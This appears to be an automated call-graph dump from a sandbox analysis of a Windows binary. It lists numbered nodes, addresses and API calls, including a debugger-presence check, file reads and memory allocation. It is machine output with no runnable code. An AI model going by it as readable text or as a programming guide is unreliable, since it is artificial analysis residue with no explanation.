35193->35194 35195 2c6fb5e 35194->35195 35196 2c6fb75 35195->35196 35197 2c689d0 20 API calls 35196->35197 35198 2c6fb81 35197->35198 35199 2c54860 11 API calls 35198->35199 35200 2c6fba2 35199->35200 35201 2c6fbad 35200->35201 35202 2c547ec 11 API calls 35201->35202 35203 2c6fbd9 35202->35203 37523 2c549a0 35203->37523 35206 2c6fbf1 35207 2c689d0 20 API calls 35206->35207 35208 2c6fbfd 35207->35208 35209 2c546d4 35208->35209 35210 2c6fc0d 35209->35210 35211 2c6fc24 35210->35211 35212 2c689d0 20 API calls 35211->35212 35213 2c6fc30 35212->35213 35214 2c6fc40 35213->35214 35215 2c546d4 35214->35215 35216 2c6fc57 35215->35216 35217 2c689d0 20 API calls 35216->35217 35218 2c6fc63 35217->35218 35219 2c6fc73 35218->35219 35220 2c689d0 20 API calls 35219->35220 35221 2c6fc96 35220->35221 35222 2c54860 11 API calls 35221->35222 35223 2c6fcb7 35222->35223 35224 2c6fccf 35223->35224 35225 2c547ec 11 API calls 35224->35225 35226 2c6fcee 35225->35226 35227 2c6fd06 35226->35227 35228 2c689d0 20 API calls 35227->35228 35229 2c6fd12 35228->35229 35230 2c54860 11 API calls 35229->35230 35231 2c6fd33 35230->35231 35232 2c6fd3e 35231->35232 35233 2c6fd4b 35232->35233 35234 2c547ec 11 API calls 35233->35234 35235 2c6fd6a 35234->35235 35236 2c6fd75 35235->35236 35237 2c689d0 20 API calls 35236->35237 35238 2c6fd8e 35237->35238 35239 2c6fd9e 35238->35239 35240 2c689d0 20 API calls 35239->35240 35241 2c6fdc1 35240->35241 35242 2c546d4 35241->35242 35243 2c6fdd1 35242->35243 35244 2c689d0 20 API calls 35243->35244 35245 2c6fdf4 35244->35245 35246 2c6fe04 35245->35246 35247 2c6fe1b 35246->35247 35248 2c689d0 20 API calls 35247->35248 35249 2c6fe27 35248->35249 35250 2c54860 11 API calls 35249->35250 35251 2c6fe48 35250->35251 35252 2c549a0 35251->35252 35253 2c6fe53 35252->35253 35254 2c6fe60 35253->35254 35255 2c547ec 11 API calls 35254->35255 35256 2c6fe7f 35255->35256 35257 2c6fe8a 35256->35257 35258 2c689d0 20 API calls 35257->35258 35259 2c6fea3 35258->35259 35260 2c6feb3 35259->35260 35261 2c6feca 35260->35261 35262 2c689d0 20 API calls 35261->35262 35263 2c6fed6 35262->35263 35264 2c6fee6 35263->35264 35265 2c6fefd 35264->35265 35266 2c689d0 20 API calls 35265->35266 35267 2c6ff09 35266->35267 35268 2c6ff19 35267->35268 35269 2c6ff30 35268->35269 35270 2c689d0 20 API calls 35269->35270 35271 2c6ff3c 35270->35271 35272 2c54860 11 API calls 35271->35272 35273 2c6ff5d 35272->35273 35274 2c6ff68 35273->35274 35275 2c6ff75 35274->35275 35276 2c547ec 11 API calls 35275->35276 35277 2c6ff94 35276->35277 35278 2c6ffac 35277->35278 35279 2c689d0 20 API calls 35278->35279 35280 2c6ffb8 35279->35280 35281 2c54860 11 API calls 35280->35281 35282 2c6ffd9 35281->35282 35283 2c6ffe4 35282->35283 35284 2c6fff1 35283->35284 35285 2c547ec 11 API calls 35284->35285 35286 2c70010 35285->35286 35287 2c70028 35286->35287 35288 2c689d0 20 API calls 35287->35288 35289 2c70034 35288->35289 35290 2c7005b 35289->35290 35291 2c689d0 20 API calls 35290->35291 35292 2c70067 35291->35292 35293 2c689d0 20 API calls 35292->35293 35294 2c7009a 35293->35294 35295 2c689d0 20 API calls 35294->35295 35296 2c700cd 35295->35296 35297 2c54860 11 API calls 35296->35297 35298 2c700ee 35297->35298 35299 2c547ec 11 API calls 35298->35299 35300 2c70125 35299->35300 35301 2c689d0 20 API calls 35300->35301 35302 2c70149 35301->35302 35303 2c54860 11 API calls 35302->35303 35304 2c7016a 35303->35304 35305 2c547ec 11 API calls 35304->35305 35306 2c701a1 35305->35306 35307 2c689d0 20 API calls 35306->35307 35308 2c701c5 35307->35308 35309 2c54860 11 API calls 35308->35309 35310 2c701e6 35309->35310 35311 2c547ec 11 API calls 35310->35311 35312 2c7021d 35311->35312 35313 2c689d0 20 API calls 35312->35313 35314 2c70241 35313->35314 35315 2c54860 11 API calls 35314->35315 35316 2c70262 35315->35316 35317 2c7026d 35316->35317 35318 2c547ec 11 API calls 35317->35318 35319 2c70299 35318->35319 35320 2c702a4 35319->35320 35321 2c689d0 20 API calls 35320->35321 35322 2c702bd 35321->35322 35323 2c702cc 35322->35323 35324 2c702d8 35323->35324 37525 2c6e0f8 35324->37525 35327 2c54530 11 API calls 35328 2c70306 35327->35328 35329 2c54860 11 API calls 35328->35329 35330 2c70327 35329->35330 35331 2c70332 35330->35331 35332 2c7033f 35331->35332 35333 2c547ec 11 API calls 35332->35333 35334 2c7035e 35333->35334 35335 2c689d0 20 API calls 35334->35335 35336 2c70382 35335->35336 35337 2c54860 11 API calls 35336->35337 35338 2c703a3 35337->35338 35339 2c703ae 35338->35339 35340 2c703bb 35339->35340 35341 2c547ec 11 API calls 35340->35341 35342 2c703da 35341->35342 35343 2c689d0 20 API calls 35342->35343 35344 2c703fe 35343->35344 35345 2c547ec 11 API calls 35344->35345 35346 2c70414 35345->35346 37535 2c57e5c 35346->37535 35349 2c70427 35352 2c54860 11 API calls 35349->35352 35350 2c70534 35351 2c54860 11 API calls 35350->35351 35353 2c70555 35351->35353 35354 2c70448 35352->35354 35355 2c70560 35353->35355 35356 2c70453 35354->35356 35357 2c547ec 11 API calls 35355->35357 35358 2c547ec 11 API calls 35356->35358 35359 2c7058c 35357->35359 35360 2c7047f 35358->35360 35361 2c70597 35359->35361 35362 2c7048a 35360->35362 35363 2c689d0 20 API calls 35361->35363 35364 2c689d0 20 API calls 35362->35364 35365 2c705b0 35363->35365 35366 2c704a3 35364->35366 35367 2c54860 11 API calls 35365->35367 35368 2c54860 11 API calls 35366->35368 35370 2c705d1 35367->35370 35369 2c704c4 35368->35369 35371 2c704cf 35369->35371 35372 2c705e9 35370->35372 35373 2c704dc 35371->35373 35374 2c547ec 11 API calls 35372->35374 35375 2c547ec 11 API calls 35373->35375 35376 2c70608 35374->35376 35377 2c704fb 35375->35377 35379 2c70620 35376->35379 35378 2c70506 35377->35378 35380 2c70513 35378->35380 35381 2c689d0 20 API calls 35379->35381 35382 2c689d0 20 API calls 35380->35382 35383 2c7062c 35381->35383 35384 2c7051f 35382->35384 35385 2c6e0f8 11 API calls 35383->35385 35386 2c54530 11 API calls 35384->35386 35387 2c7063c 35385->35387 35388 2c7052f 35386->35388 35389 2c54530 11 API calls 35387->35389 35390 2c54860 11 API calls 35388->35390 35389->35388 35391 2c7066d 35390->35391 35392 2c70678 35391->35392 35393 2c547ec 11 API calls 35392->35393 35394 2c706a4 35393->35394 35395 2c706af 35394->35395 35396 2c689d0 20 API calls 35395->35396 35397 2c706c8 35396->35397 35398 2c54860 11 API calls 35397->35398 35399 2c706e9 35398->35399 35400 2c706f4 35399->35400 35401 2c547ec 11 API calls 35400->35401 35402 2c70720 35401->35402 35403 2c7072b 35402->35403 35404 2c689d0 20 API calls 35403->35404 35405 2c70744 35404->35405 37539 2c5c364 GetModuleFileNameA 35405->37539 35408 2c54530 11 API calls 35409 2c70761 35408->35409 35410 2c54a00 11 API calls 35409->35410 35411 2c70794 35410->35411 35412 2c54860 11 API calls 35411->35412 35413 2c707b5 35412->35413 35414 2c707cd 35413->35414 35415 2c547ec 11 API calls 35414->35415 35416 2c707ec 35415->35416 35417 2c70804 35416->35417 35418 2c689d0 20 API calls 35417->35418 35419 2c70810 35418->35419 35420 2c54860 11 API calls 35419->35420 35421 2c70831 35420->35421 35422 2c70849 35421->35422 35423 2c547ec 11 API calls 35422->35423 35424 2c70868 35423->35424 35425 2c546d4 35424->35425 35426 2c70880 35425->35426 35427 2c689d0 20 API calls 35426->35427 35428 2c7088c 35427->35428 35429 2c54860 11 API calls 35428->35429 35430 2c708ad 35429->35430 35431 2c708c5 35430->35431 35432 2c547ec 11 API calls 35431->35432 35433 2c708e4 35432->35433 35434 2c546d4 35433->35434 35435 2c708fc 35434->35435 35436 2c689d0 20 API calls 35435->35436 35437 2c70908 35436->35437 35438 2c54860 11 API calls 35437->35438 35439 2c70929 35438->35439 35440 2c70941 35439->35440 35441 2c547ec 11 API calls 35440->35441 35442 2c70960 35441->35442 35443 2c546d4 35442->35443 35444 2c70978 35443->35444 35445 2c689d0 20 API calls 35444->35445 35446 2c70984 35445->35446 35447 2c6e0f8 11 API calls 35446->35447 35448 2c70994 35447->35448 35449 2c54530 11 API calls 35448->35449 35450 2c709a4 35449->35450 35451 2c54860 11 API calls 35450->35451 35452 2c709c5 35451->35452 35453 2c709d0 35452->35453 35454 2c547ec 11 API calls 35453->35454 35455 2c709fc 35454->35455 35456 2c70a07 35455->35456 35457 2c70a14 35456->35457 35458 2c689d0 20 API calls 35457->35458 35459 2c70a20 35458->35459 35460 2c54860 11 API calls 35459->35460 35461 2c70a41 35460->35461 35462 2c70a4c 35461->35462 35463 2c547ec 11 API calls 35462->35463 35464 2c70a78 35463->35464 35465 2c70a83 35464->35465 35466 2c70a90 35465->35466 35467 2c689d0 20 API calls 35466->35467 35468 2c70a9c 35467->35468 35469 2c54860 11 API calls 35468->35469 35470 2c70abd 35469->35470 35471 2c70ac8 35470->35471 35472 2c546d4 35471->35472 35473 2c70ad5 35472->35473 35474 2c547ec 11 API calls 35473->35474 35475 2c70af4 35474->35475 35476 2c70aff 35475->35476 35477 2c70b0c 35476->35477 35478 2c689d0 20 API calls 35477->35478 35479 2c70b18 35478->35479 35480 2c549a0 35479->35480 35481 2c70b22 35480->35481 35482 2c70b2f 35481->35482 35483 2c57e5c GetFileAttributesA 35482->35483 35484 2c70b3a 35483->35484 35485 2c70b42 35484->35485 35486 2c712fe 35484->35486 35487 2c54860 11 API calls 35485->35487 35488 2c54860 11 API calls 35486->35488 35489 2c70b63 35487->35489 35490 2c7131f 35488->35490 35492 2c70b7b 35489->35492 35491 2c71337 35490->35491 35493 2c547ec 11 API calls 35491->35493 35494 2c547ec 11 API calls 35492->35494 35495 2c71356 35493->35495 35496 2c70b9a 35494->35496 35497 2c71361 35495->35497 35498 2c70bb2 35496->35498 35499 2c689d0 20 API calls 35497->35499 35500 2c689d0 20 API calls 35498->35500 35501 2c7137a 35499->35501 35502 2c70bbe 35500->35502 35503 2c54860 11 API calls 35501->35503 35504 2c54860 11 API calls 35502->35504 35506 2c7139b 35503->35506 35505 2c70bdf 35504->35505 35507 2c70bf7 35505->35507 35508 2c713b3 35506->35508 35510 2c547ec 11 API calls 35507->35510 35509 2c547ec 11 API calls 35508->35509 35511 2c713d2 35509->35511 35512 2c70c16 35510->35512 35514 2c713dd 35511->35514 35513 2c70c2e 35512->35513 35516 2c689d0 20 API calls 35513->35516 35515 2c689d0 20 API calls 35514->35515 35517 2c713f6 35515->35517 35518 2c70c3a 35516->35518 35519 2c54860 11 API calls 35517->35519 35520 2c54860 11 API calls 35518->35520 35521 2c71417 35519->35521 35522 2c70c5b 35520->35522 35525 2c71422 35521->35525 35523 2c549a0 35522->35523 35524 2c70c66 35523->35524 35526 2c547ec 11 API calls 35524->35526 35527 2c547ec 11 API calls 35525->35527 35529 2c70c92 35526->35529 35528 2c7144e 35527->35528 35530 2c549a0 35528->35530 35532 2c70c9d 35529->35532 35531 2c71459 35530->35531 35533 2c71466 35531->35533 35534 2c546d4 35532->35534 35536 2c689d0 20 API calls 35533->35536 35535 2c70caa 35534->35535 35537 2c689d0 20 API calls 35535->35537 35538 2c71472 35536->35538 35539 2c70cb6 35537->35539 37542 2c54de0 35538->37542 35541 2c54de0 35539->35541 35543 2c70cc7 35541->35543 38039 2c6dd70 35543->38039 35549 2c54530 11 API calls 35550 2c70ce8 35549->35550 35552 2c54860 11 API calls 35550->35552 35554 2c70d09 35552->35554 35556 2c70d14 35554->35556 35557 2c546d4 35556->35557 35559 2c70d21 35557->35559 35561 2c547ec 11 API calls 35559->35561 35563 2c70d40 35561->35563 35566 2c70d4b 35563->35566 35567 2c546d4 35566->35567 35568 2c70d58 35567->35568 35570 2c689d0 20 API calls 35568->35570 35572 2c70d64 35570->35572 35574 2c54860 11 API calls 35572->35574 35575 2c70d85 35574->35575 35577 2c70d90 35575->35577 35578 2c70d9d 35577->35578 35581 2c547ec 11 API calls 35578->35581 35583 2c70dbc 35581->35583 35586 2c70dc7 35583->35586 35588 2c546d4 35586->35588 35590 2c70dd4 35588->35590 35592 2c689d0 20 API calls 35590->35592 35594 2c70de0 35592->35594 35596 2c54860 11 API calls 35594->35596 35598 2c70e01 35596->35598 35600 2c549a0 35598->35600 35601 2c70e0c 35600->35601 35602 2c70e19 35601->35602 35604 2c547ec 11 API calls 35602->35604 35607 2c70e38 35604->35607 35608 2c549a0 35607->35608 35609 2c70e43 35608->35609 35611 2c546d4 35609->35611 35613 2c70e50 35611->35613 35615 2c689d0 20 API calls 35613->35615 35617 2c70e5c 35615->35617 35619 2c6e24c 16 API calls 35617->35619 35621 2c70e71 35619->35621 35623 2c55818 13 API calls 35621->35623 35625 2c70e84 35623->35625 35627 2c54860 11 API calls 35625->35627 35628 2c70ea5 35627->35628 35630 2c546d4 35628->35630 35632 2c70ebd 35630->35632 35634 2c547ec 11 API calls 35632->35634 35636 2c70edc 35634->35636 35637 2c546d4 35636->35637 35639 2c70ef4 35637->35639 35641 2c689d0 20 API calls 35639->35641 35643 2c70f00 35641->35643 35645 2c54860 11 API calls 35643->35645 35646 2c70f21 35645->35646 35647 2c70f39 35646->35647 35649 2c547ec 11 API calls 35647->35649 35652 2c70f58 35649->35652 35653 2c70f70 35652->35653 35656 2c689d0 20 API calls 35653->35656 35658 2c70f7c 35656->35658 35660 2c54530 11 API calls 35658->35660 35661 2c70f8b 35660->35661 38054 2c6e1d4 35661->38054 35665 2c70f9d 35667 2c54860 11 API calls 35665->35667 35666 2c72ad8 35668 2c54860 11 API calls 35666->35668 35669 2c70fbe 35667->35669 35670 2c72af9 35668->35670 35674 2c70fc9 35669->35674 35672 2c72b04 35670->35672 35676 2c72b11 35672->35676 35675 2c70fd6 35674->35675 35679 2c547ec 11 API calls 35675->35679 35677 2c547ec 11 API calls 35676->35677 35680 2c72b30 35677->35680 35682 2c70ff5 35679->35682 35689 2c72b3b 35680->35689 35684 2c549a0 35682->35684 35686 2c71000 35684->35686 35688 2c546d4 35686->35688 35691 2c7100d 35688->35691 35692 2c689d0 20 API calls 35689->35692 35694 2c689d0 20 API calls 35691->35694 35695 2c72b54 35692->35695 35697 2c71019 35694->35697 35698 2c54860 11 API calls 35695->35698 35700 2c54860 11 API calls 35697->35700 35701 2c72b75 35698->35701 35703 2c7103a 35700->35703 35706 2c72b80 35701->35706 35705 2c71045 35703->35705 35708 2c71052 35705->35708 35709 2c72b8d 35706->35709 35712 2c547ec 11 API calls 35708->35712 35713 2c547ec 11 API calls 35709->35713 35716 2c71071 35712->35716 35714 2c72bac 35713->35714 35718 2c72bb7 35714->35718 35720 2c7107c 35716->35720 35724 2c689d0 20 API calls 35718->35724 35722 2c71089 35720->35722 35726 2c689d0 20 API calls 35722->35726 35727 2c72bd0 35724->35727 35729 2c71095 35726->35729 35730 2c54860 11 API calls 35727->35730 35732 2c54860 11 API calls 35729->35732 35733 2c72bf1 35730->35733 35735 2c710b6 35732->35735 35738 2c546d4 35733->35738 35737 2c710c1 35735->35737 35741 2c547ec 11 API calls 35737->35741 35739 2c72c09 35738->35739 35742 2c547ec 11 API calls 35739->35742 35744 2c710ed 35741->35744 35745 2c72c28 35742->35745 35749 2c710f8 35744->35749 35747 2c72c33 35745->35747 35752 2c72c40 35747->35752 35751 2c71105 35749->35751 35756 2c689d0 20 API calls 35751->35756 35754 2c689d0 20 API calls 35752->35754 35757 2c72c4c 35754->35757 35759 2c71111 35756->35759 35760 2c54860 11 API calls 35757->35760 35762 2c54860 11 API calls 35759->35762 35763 2c72c6d 35760->35763 35765 2c71132 35762->35765 35768 2c72c78 35763->35768 35767 2c549a0 35765->35767 35770 2c7113d 35767->35770 35772 2c547ec 11 API calls 35768->35772 35771 2c547ec 11 API calls 35770->35771 35773 2c71169 35771->35773 35774 2c72ca4 35772->35774 35776 2c549a0 35773->35776 35779 2c72caf 35774->35779 35778 2c71174 35776->35778 35781 2c71181 35778->35781 35783 2c689d0 20 API calls 35779->35783 35784 2c689d0 20 API calls 35781->35784 35785 2c72cc8 35783->35785 35786 2c7118d 35784->35786 35785->35184 35789 2c72ced 35785->35789 35788 2c54860 11 API calls 35786->35788 35791 2c711ae 35788->35791 35792 2c54860 11 API calls 35789->35792 35794 2c549a0 35791->35794 35797 2c72d0e 35792->35797 35796 2c711b9 35794->35796 35798 2c547ec 11 API calls 35796->35798 35799 2c72d26 35797->35799 35801 2c711e5 35798->35801 35803 2c547ec 11 API calls 35799->35803 35802 2c549a0 35801->35802 35805 2c711f0 35802->35805 35806 2c72d45 35803->35806 35808 2c711fd 35805->35808 35809 2c72d50 35806->35809 35811 2c689d0 20 API calls 35808->35811 35812 2c72d5d 35809->35812 35813 2c71209 35811->35813 35814 2c689d0 20 API calls 35812->35814 35816 2c549a0 35813->35816 35817 2c72d69 35814->35817 35819 2c71213 35816->35819 35820 2c54860 11 API calls 35817->35820 38060 2c54d74 35819->38060 35829 2c72d8a 35820->35829 35834 2c547ec 11 API calls 35829->35834 35840 2c72dc1 35834->35840 35842 2c689d0 20 API calls 35840->35842 35845 2c72de5 35842->35845 35848 2c54860 11 API calls 35845->35848 35852 2c72e06 35848->35852 35855 2c72e1e 35852->35855 35858 2c547ec 11 API calls 35855->35858 35862 2c72e3d 35858->35862 35863 2c72e55 35862->35863 35864 2c689d0 20 API calls 35863->35864 35866 2c72e61 35864->35866 35868 2c54860 11 API calls 35866->35868 35869 2c72e82 35868->35869 35871 2c72e8d 35869->35871 35874 2c547ec 11 API calls 35871->35874 35876 2c72eb9 35874->35876 35878 2c72ec4 35876->35878 35880 2c689d0 20 API calls 35878->35880 35882 2c72edd 35880->35882 37544 2c57acc 35882->37544 35891 2c54530 11 API calls 35893 2c72f09 35891->35893 35895 2c54860 11 API calls 35893->35895 35897 2c72f2a 35895->35897 35900 2c72f35 35897->35900 35903 2c547ec 11 API calls 35900->35903 35905 2c72f61 35903->35905 35908 2c72f6c 35905->35908 35910 2c72f79 35908->35910 35911 2c689d0 20 API calls 35910->35911 35913 2c72f85 35911->35913 35915 2c54860 11 API calls 35913->35915 35917 2c72fa6 35915->35917 35919 2c72fb1 35917->35919 35920 2c72fbe 35919->35920 35922 2c547ec 11 API calls 35920->35922 35924 2c72fdd 35922->35924 35926 2c72fe8 35924->35926 35929 2c72ff5 35926->35929 35930 2c689d0 20 API calls 35929->35930 35932 2c73001 35930->35932 37557 2c6f108 35932->37557 35938 2c54530 11 API calls 35940 2c73021 35938->35940 35942 2c54860 11 API calls 35940->35942 35944 2c73042 35942->35944 35947 2c7304d 35944->35947 35949 2c7305a 35947->35949 35951 2c547ec 11 API calls 35949->35951 35954 2c73079 35951->35954 35955 2c73091 35954->35955 35957 2c689d0 20 API calls 35955->35957 35959 2c7309d 35957->35959 35961 2c54860 11 API calls 35959->35961 35963 2c730be 35961->35963 35965 2c730c9 35963->35965 35966 2c730d6 35965->35966 35968 2c547ec 11 API calls 35966->35968 35973 2c730f5 35968->35973 35976 2c689d0 20 API calls 35973->35976 35978 2c73119 35976->35978 35980 2c54860 11 API calls 35978->35980 35983 2c7313a 35980->35983 35984 2c73152 35983->35984 35986 2c547ec 11 API calls 35984->35986 35988 2c73171 35986->35988 35990 2c7317c 35988->35990 35991 2c73189 35990->35991 35993 2c689d0 20 API calls 35991->35993 35995 2c73195 35993->35995 35997 2c731a6 35995->35997 37562 2c6e24c 35997->37562 36004 2c54860 11 API calls 36005 2c731f0 36004->36005 36007 2c731fb 36005->36007 36008 2c73208 36007->36008 36010 2c547ec 11 API calls 36008->36010 36012 2c73227 36010->36012 36015 2c73232 36012->36015 36017 2c7323f 36015->36017 36018 2c689d0 20 API calls 36017->36018 36019 2c7324b 36018->36019 36021 2c54860 11 API calls 36019->36021 36023 2c7326c 36021->36023 36025 2c73277 36023->36025 36027 2c547ec 11 API calls 36025->36027 36029 2c732a3 36027->36029 36032 2c732ae 36029->36032 36035 2c689d0 20 API calls 36032->36035 36036 2c732c7 36035->36036 36038 2c54860 11 API calls 36036->36038 36042 2c732e8 36038->36042 36044 2c547ec 11 API calls 36042->36044 36049 2c7331f 36044->36049 36051 2c689d0 20 API calls 36049->36051 36052 2c73343 36051->36052 36054 2c54860 11 API calls 36052->36054 36057 2c73364 36054->36057 36058 2c7337c 36057->36058 36060 2c547ec 11 API calls 36058->36060 36064 2c7339b 36060->36064 36065 2c733b3 36064->36065 36067 2c689d0 20 API calls 36065->36067 36068 2c733bf 36067->36068 36069 2c54530 11 API calls 36068->36069 36071 2c733ce 36069->36071 36072 2c54530 11 API calls 36071->36072 36074 2c733dd 36072->36074 36076 2c54530 11 API calls 36074->36076 36077 2c733ec 36076->36077 36078 2c54530 11 API calls 36077->36078 36080 2c733fb 36078->36080 36082 2c54530 11 API calls 36080->36082 36083 2c7340a 36082->36083 36085 2c54530 11 API calls 36083->36085 36087 2c73419 36085->36087 36088 2c54530 11 API calls 36087->36088 36090 2c73428 36088->36090 36091 2c54530 11 API calls 36090->36091 37513 2c52eed 37512->37513 37514 2c52ef8 GetTickCount 37512->37514 37513->35107 37514->35107 37516 2c6f711 37515->37516 37517 2c6f6fa GetProcAddress 37515->37517 37516->35182 37518 2c6f709 37517->37518 37518->35182 37520 2c6f760 GetProcAddress 37519->37520 37521 2c6f786 37519->37521 37520->37521 37522 2c6f774 CheckRemoteDebuggerPresent 37520->37522 37521->35184 37521->35187 37522->37521 37524 2c549a4 37523->37524 37524->35206 37532 2c6e114 37525->37532 37526 2c6e197 37527 2c544dc 11 API calls 37526->37527 37528 2c6e19f 37527->37528 37530 2c54530 11 API calls 37528->37530 37529 2c549f8 11 API calls 37529->37532 37531 2c6e1aa 37530->37531 37533 2c54500 11 API calls 37531->37533 37532->37526 37532->37529 37534 2c6e1c4 37533->37534 37534->35327 37536 2c549a0 37535->37536 37537 2c57e66 GetFileAttributesA 37536->37537 37538 2c57e71 37537->37538 37538->35349 37538->35350 37540 2c545cc 11 API calls 37539->37540 37541 2c5c38b 37540->37541 37541->35408 37543 2c54de6 37542->37543 37545 2c57adc 37544->37545 37546 2c57afd 37545->37546 38085 2c57660 42 API calls 37545->38085 37548 2c6f16c 37546->37548 37549 2c6f189 37548->37549 37550 2c6f1e7 37549->37550 38086 2c546c4 11 API calls 37549->38086 38087 2c54530 11 API calls 37549->38087 37552 2c544dc 11 API calls 37550->37552 37553 2c6f1fc 37552->37553 37555 2c544dc 11 API calls 37553->37555 37556 2c6f204 37555->37556 37556->35891 37558 2c54530 11 API calls 37557->37558 37560 2c6f11c 37558->37560 37559 2c6f163 37559->35938 37560->37559 37561 2c549f8 11 API calls 37560->37561 37561->37560 37563 2c6e265 37562->37563 37564 2c54530 11 API calls 37563->37564 37565 2c6e291 37564->37565 38088 2c557d0 37565->38088 37567 2c6e2d1 37568 2c54530 11 API calls 37567->37568 37570 2c6e2e3 37568->37570 37569 2c54a00 11 API calls 37571 2c6e2b5 37569->37571 37573 2c54500 11 API calls 37570->37573 37571->37567 37571->37569 37571->37570 38091 2c54a40 11 API calls 37571->38091 37574 2c6e348 37573->37574 37575 2c55818 37574->37575 37576 2c5581f 37575->37576 37577 2c55839 37576->37577 38115 2c557dc 13 API calls 37576->38115 37577->36004 38040 2c54f20 SysAllocStringLen 38039->38040 38041 2c6dd85 38040->38041 38042 2c544dc 11 API calls 38041->38042 38043 2c6dd9a 38042->38043 38044 2c6ddaa RtlDosPathNameToNtPathName_U 38043->38044 38202 2c6dbdc 38044->38202 38046 2c6ddc6 NtOpenFile NtQueryInformationFile 38047 2c54bcc 11 API calls 38046->38047 38048 2c6de01 38047->38048 38049 2c549f8 11 API calls 38048->38049 38050 2c6de0d NtReadFile NtClose 38049->38050 38051 2c6de37 38050->38051 38052 2c54c60 SysFreeString 38051->38052 38053 2c6de3f 38052->38053 38053->35549 38055 2c6e1e6 38054->38055 38203 2c58d94 38055->38203 38058 2c544dc 11 API calls 38059 2c6e239 38058->38059 38059->35665 38059->35666 38061 2c54d7a 38060->38061 38085->37546 38086->37549 38087->37549 38092 2c55644 38088->38092 38091->37571 38093 2c55663 38092->38093 38098 2c5567d 38092->38098 38094 2c5566e 38093->38094 38109 2c52cf4 11 API calls 38093->38109 38110 2c5563c 13 API calls 38094->38110 38097 2c55678 38097->37571 38099 2c556c6 38098->38099 38111 2c52cf4 11 API calls 38098->38111 38101 2c556d3 38099->38101 38102 2c55708 38099->38102 38112 2c52c44 11 API calls 38101->38112 38113 2c52c10 11 API calls 38102->38113 38105 2c55703 38105->38097 38108 2c55644 16 API calls 38105->38108 38106 2c55712 38106->38105 38114 2c55624 16 API calls 38106->38114 38108->38105 38109->38094 38110->38097 38111->38099 38112->38105 38113->38106 38114->38105 38115->37577 38202->38046 38204 2c58da1 38203->38204 38205 2c58dc7 38204->38205 38207 2c57660 42 API calls 38204->38207 38205->38058 38207->38205 38209 2c54edc 38210 2c54ee9 38209->38210 38214 2c54ef0 38209->38214 38215 2c54c38 38210->38215 38221 2c54c50 38214->38221 38216 2c54c4c 38215->38216 38217 2c54c3c SysAllocStringLen 38215->38217 38216->38214 38217->38216 38218 2c54c30 38217->38218 38219 2c54f26 SysAllocStringLen 38218->38219 38220 2c54f3c 38218->38220 38219->38218 38219->38220 38220->38214 38222 2c54c56 SysFreeString 38221->38222 38223 2c54c5c 38221->38223 38222->38223 38224 2c51c6c 38225 2c51d04 38224->38225 38226 2c51c7c 38224->38226 38229 2c51d0d 38225->38229 38230 2c51f58 38225->38230 38227 2c51cc0 38226->38227 38228 2c51c89 38226->38228 38234 2c51724 10 API calls 38227->38234 38231 2c51c94 38228->38231 38272 2c51724 38228->38272 38233 2c51d25 38229->38233 38246 2c51e24 38229->38246 38232 2c51fec 38230->38232 38236 2c51fac 38230->38236 38237 2c51f68 38230->38237 38239 2c51d2c 38233->38239 38243 2c51d48 38233->38243 38248 2c51dfc 38233->38248 38255 2c51cd7 38234->38255 38240 2c51fb2 38236->38240 38244 2c51724 10 API calls 38236->38244 38241 2c51724 10 API calls 38237->38241 38238 2c51e7c 38242 2c51724 10 API calls 38238->38242 38262 2c51e95 38238->38262 38245 2c51f82 38241->38245 38247 2c51f2c 38242->38247 38252 2c51d79 Sleep 38243->38252 38257 2c51d9c 38243->38257 38249 2c51fc1 38244->38249 38266 2c51a8c 8 API calls 38245->38266 38270 2c51fa7 38245->38270 38246->38238 38251 2c51e55 Sleep 38246->38251 38246->38262 38247->38262 38265 2c51a8c 8 API calls 38247->38265 38250 2c51724 10 API calls 38248->38250 38267 2c51a8c 8 API calls 38249->38267 38249->38270 38260 2c51e05 38250->38260 38251->38238 38256 2c51e6f Sleep 38251->38256 38253 2c51d91 Sleep 38252->38253 38252->38257 38253->38243 38254 2c51ca1 38263 2c51cb9 38254->38263 38296 2c51a8c 38254->38296 38261 2c51a8c 8 API calls 38255->38261 38264 2c51cfd 38255->38264 38256->38246 38259 2c51e1d 38260->38259 38269 2c51a8c 8 API calls 38260->38269 38261->38264 38268 2c51f50 38265->38268 38266->38270 38271 2c51fe4 38267->38271 38269->38259 38273 2c5173c 38272->38273 38274 2c51968 38272->38274 38285 2c517cb Sleep 38273->38285 38287 2c5174e 38273->38287 38275 2c51a80 38274->38275 38276 2c51938 38274->38276 38278 2c51684 VirtualAlloc 38275->38278 38279 2c51a89 38275->38279 38280 2c51947 Sleep 38276->38280 38289 2c51986 38276->38289 38277 2c5175d 38277->38254 38281 2c516bf 38278->38281 38282 2c516af 38278->38282 38279->38254 38283 2c5195d Sleep 38280->38283 38280->38289 38281->38254 38313 2c51644 38282->38313 38283->38276 38285->38287 38288 2c517e4 Sleep 38285->38288 38286 2c5182c 38295 2c51838 38286->38295 38319 2c515cc 38286->38319 38287->38277 38287->38286 38290 2c5180a Sleep 38287->38290 38288->38273 38291 2c515cc VirtualAlloc 38289->38291 38293 2c519a4 38289->38293 38290->38286 38292 2c51820 Sleep 38290->38292 38291->38293 38292->38287 38293->38254 38295->38254 38297 2c51aa1 38296->38297 38298 2c51b6c 38296->38298 38300 2c51aa7 38297->38300 38302 2c51b13 Sleep 38297->38302 38299 2c516e8 38298->38299 38298->38300 38301 2c51c66 38299->38301 38304 2c51644 2 API calls 38299->38304 38303 2c51ab0 38300->38303 38306 2c51b4b Sleep 38300->38306 38309 2c51b81 38300->38309 38301->38263 38302->38300 38305 2c51b2d Sleep 38302->38305 38303->38263 38307 2c516f5 VirtualFree 38304->38307 38305->38297 38308 2c51b61 Sleep 38306->38308 38306->38309 38310 2c5170d 38307->38310 38308->38300 38311 2c51c00 VirtualFree 38309->38311 38312 2c51ba4 38309->38312 38310->38263 38311->38263 38312->38263 38314 2c51681 38313->38314 38315 2c5164d 38313->38315 38314->38281 38315->38314 38316 2c5164f Sleep 38315->38316 38317 2c51664 38316->38317 38317->38314 38318 2c51668 Sleep 38317->38318 38318->38315 38323 2c51560 38319->38323 38321 2c515d4 VirtualAlloc 38322 2c515eb 38321->38322 38322->38295 38324 2c51500 38323->38324 38324->38321 38325 2c7d2fc 38335 2c5656c 38325->38335 38329 2c7d32a 38340 2c7c35c timeSetEvent 38329->38340 38331 2c7d334 38332 2c7d342 GetMessageA 38331->38332 38333 2c7d336 TranslateMessage DispatchMessageA 38332->38333 38334 2c7d352 38332->38334 38333->38332 38336 2c56577 38335->38336 38341 2c54198 38336->38341 38339 2c542ac SysFreeString SysReAllocStringLen SysAllocStringLen 38339->38329 38340->38331 38342 2c541de 38341->38342 38343 2c54257 